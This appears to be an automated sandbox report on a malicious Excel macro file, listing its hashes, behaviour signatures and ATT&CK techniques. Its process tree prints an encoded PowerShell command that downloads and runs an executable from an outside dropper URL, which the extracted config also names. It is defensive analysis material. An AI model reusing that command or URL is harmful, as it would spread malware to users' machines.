Analysis

  • max time kernel
    123s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    08-02-2022 02:24

General

  • Target

    Drawings.xlsm

  • Size

    147KB

  • MD5

    78a966dd22bc2e85d2f807e2575ea471

  • SHA1

    7daac212c4080fc4c6abc01f515c7548be710d54

  • SHA256

    a2e56ee7abc330ee99d988aee0c118f06003cd7062c3a68bedec7faa59f41f55

  • SHA512

    d945df1e709e95253a58242ac5b85f2b260c03f005aa1fbc97c01699bac33d5b87190c25ebed57bb2870b0ec91e8e09437d5a7f3e7aa2621e670856e7b07bd2c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://cheatsheet2weightloss.com/Designs.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Drawings.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBoAGUAYQB0AHMAaABlAGUAdAAyAHcAZQBpAGcAaAB0AGwAbwBzAHMALgBjAG8AbQAvAEQAZQBzAGkAZwBuAHMALgBlAHgAZQAnACwAKAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQApACsAJwBcAHAATgBXAEwAdwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAHAATgBXAEwAdwAuAGUAeABlAA==
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBoAGUAYQB0AHMAaABlAGUAdAAyAHcAZQBpAGcAaAB0AGwAbwBzAHMALgBjAG8AbQAvAEQAZQBzAGkAZwBuAHMALgBlAHgAZQAnACwAKAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQApACsAJwBcAHAATgBXAEwAdwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAHAATgBXAEwAdwAuAGUAeABlAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1984

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/952-55-0x000000002F501000-0x000000002F504000-memory.dmp
    Filesize

    12KB

  • memory/952-56-0x00000000718F1000-0x00000000718F3000-memory.dmp
    Filesize

    8KB

  • memory/952-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/952-58-0x00000000728DD000-0x00000000728E8000-memory.dmp
    Filesize

    44KB

  • memory/952-59-0x0000000076B81000-0x0000000076B83000-memory.dmp
    Filesize

    8KB

  • memory/952-61-0x000000000083E000-0x000000000083F000-memory.dmp
    Filesize

    4KB

  • memory/952-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1984-62-0x000000006C810000-0x000000006CDBB000-memory.dmp
    Filesize

    5.7MB

  • memory/1984-63-0x0000000002360000-0x0000000002FAA000-memory.dmp
    Filesize

    12.3MB

  • memory/1984-64-0x000000006C810000-0x000000006CDBB000-memory.dmp
    Filesize

    5.7MB

  • memory/1984-65-0x0000000002360000-0x0000000002FAA000-memory.dmp
    Filesize

    12.3MB